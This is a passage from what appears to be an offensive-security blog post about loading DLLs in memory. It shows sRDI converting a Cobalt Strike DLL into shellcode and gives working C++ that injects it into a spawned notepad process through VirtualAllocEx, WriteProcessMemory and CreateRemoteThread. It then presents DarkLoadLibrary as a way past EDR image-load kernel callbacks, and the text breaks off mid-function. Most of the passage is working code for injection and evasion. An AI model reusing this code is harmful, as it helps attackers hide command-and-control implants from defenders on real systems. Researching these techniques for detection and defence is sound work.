                        Number of seconds to pause between loading imports
There are some really cool pieces of functionality here, so I recommend taking a look through ShellcodeRDI.py, but that's not in scope for now.
The Cobalt Strike DLL Entry is Start, and that can be verified by running something like this:
Running sRDI and specifying Start as the FUNCTION_NAME:
This can now be loaded into the injector as shown earlier. Again, for the sake of not crashing my Visual Studio, I'll just read the bytes into memory, as opposed to storing 20,000 bytes:
const char* path = "G:\\Dropbox\\artifact.bin";
LPVOID buf;
DWORD bufSz = ReadBytes((char*)path, &buf);
Because sRDI provides a bootstrap, none of the GetReflectiveLoaderOffset stuff is needed. Below is the injection code:
void remote_exec(DWORD bufSz, LPVOID buf)
{
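LPSTARTUPINFOA si = new STARTUPINFOA();
si->cb = sizeof(STARTUPINFOA); // CreateProcess expects cb to hold the structure size
PPROCESS_INFORMATION pi = new PROCESS_INFORMATION();
// CreateProcessA returns a BOOL: zero means failure
if (!CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, TRUE, 0, NULL, NULL, si, pi))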
{
printf("[!] Failed to create process!\n");
return;
}
else
{
printf(" :: Process ID: %d\n", pi->dwProcessId);
printf(" :: Process Handle: %p\n", pi->hProcess);
LPVOID pAddress = nullptr;
BOOL bProtect;
HANDLE hThread;
DWORD lpflOldProtect = 0;
DWORD dwLdrOffset = 0;
pAddress = VirtualAllocEx(pi->hProcess, 0, bufSz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf(" :: Base Address: %p\n", pAddress);
WriteProcessMemory(pi->hProcess, pAddress, buf, bufSz, NULL);
printf(" :: Bytes Written!\n");
bProtect = VirtualProtectEx(pi->hProcess, pAddress, bufSz, PAGE_EXECUTE_READ, &lpflOldProtect);
printf(" :: Set PAGE_EXECUTE_READ\n");
//dwLdrOffset = GetReflectiveLoaderOffset(buf);
//printf(" :: Loader Offset: %zd\n", dwLdrOffset);
//LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
//printf(" :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);
hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
printf(" :: Thread: %p\n", hThread);
WaitForSingleObject(hThread, 5000);
if (pi->hProcess)CloseHandle(pi->hProcess);
if (pi->hThread)CloseHandle(pi->hThread);
if (hThread)CloseHandle(hThread);
}
return;
}
Note the commented out code:
//dwLdrOffset = GetReflectiveLoaderOffset(buf);
//printf(" :: Loader Offset: %zd\n", dwLdrOffset);
//LPTHREAD_START_ROUTINE lpParameter = (LPTHREAD_START_ROUTINE)((ULONG_PTR)pAddress + dwLdrOffset);
//printf(" :: LPTHREAD_START_ROUTINE: %p\n", lpParameter);
And the thread is created normally:
hThread = CreateRemoteThread(pi->hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
Running this code shows notepad.exe being injected into and the DLL being executed:
Similarly to the Reflective DLL, no linked DLL is shown:

Recap

A few tangents later, what has actually been covered? So far:
  1. Looked at loading DLLs from disk and the associated kernel-callback (PsSetLoadImageNotifyRoutine), as well as the DLLs being linked to the PEB.
  2. Poked around some Reflective DLLs.
  3. Looked at sRDI and created a little POC.
Moving on!

DarkLoadLibrary

A few weeks ago, batsec posted an excellent blog called Bypassing Image Load Kernel Callbacks on behalf of MDSec. This project looked at the kernel-callbacks associated with loading modules and linking them to the PEB.
What makes this interesting is the following table from the blog:
As long as I haven't misunderstood the library, this only works within the current process and doesn't support any kind of remote process interactions right out of the box, which is fine. We will work with that. According to the table, however, there's probably not any reason to avoid it, it does it all! Batsec goes on to discuss how this library is essentially the end product of rewriting the Windows library loader from scratch, so kudos to him.

A Quick Test

Below is the example provided:
#include <stdio.h>
#include <windows.h>
#include "pebutils.h"
#include "darkloadlibrary.h"
typedef DWORD (WINAPI * _ThisIsAFunction) (LPCWSTR);
VOID main()
{
GETPROCESSHEAP pGetProcessHeap = (GETPROCESSHEAP)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "GetProcessHeap");
HEAPFREE pHeapFree = (HEAPFREE)GetFunctionAddress(IsModulePresent(L"Kernel32.dll"), "HeapFree");
PDARKMODULE DarkModule = DarkLoadLibrary(
LOAD_LOCAL_FILE,
L"TestDLL.dll",
NULL,
0,
NULL
);
if (!DarkModule->bSuccess)
{
printf("load failed: %S\n", DarkModule->ErrorMsg);
pHeapFree(pGetProcessHeap(), 0, DarkModule->ErrorMsg);
pHeapFree(pGetProcessHeap(), 0, DarkModule);
return;
}
_ThisIsAFunction ThisIsAFunction = (_ThisIsAFunction)GetFunctionAddress(
(HMODULE)DarkModule->ModuleBase,
"CallThisFunction"
);
pHeapFree(pGetProcessHeap(), 0, DarkModule);
if (!ThisIsAFunction)
{
printf("failed to find it\n");
return;
}
ThisIsAFunction(L"this is working!!!");
return;
}
It loads TestDLL.dll, resolves the CallThisFunction export, and calls it through the ThisIsAFunction pointer. Simples.
Some messing about later, I ended up with a small PE that uses both the load options. First off though, the in memory replicator (read it from a file and store in a buffer):
DWORD read_bytes_from_file(LPCWSTR path, LPVOID* buf)
{
HANDLE hFile;
DWORD size, readAmount = 0;
hFile = CreateFileW(path, GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
size = GetFileSize(hFile, 0);
*buf = malloc(size + 16);
BOOL bRead = ReadFile(hFile, *buf, size, &readAmount, 0);
if (bRead == FALSE)
{
readAmount = 0;
}
CloseHandle(hFile);
}
return readAmount;
}
A standard wmain:
int wmain(int argc, wchar_t* argv[])
{
LPCWSTR path;
int mode = 0;
if (argc == 3)
{
mode = atoi(argv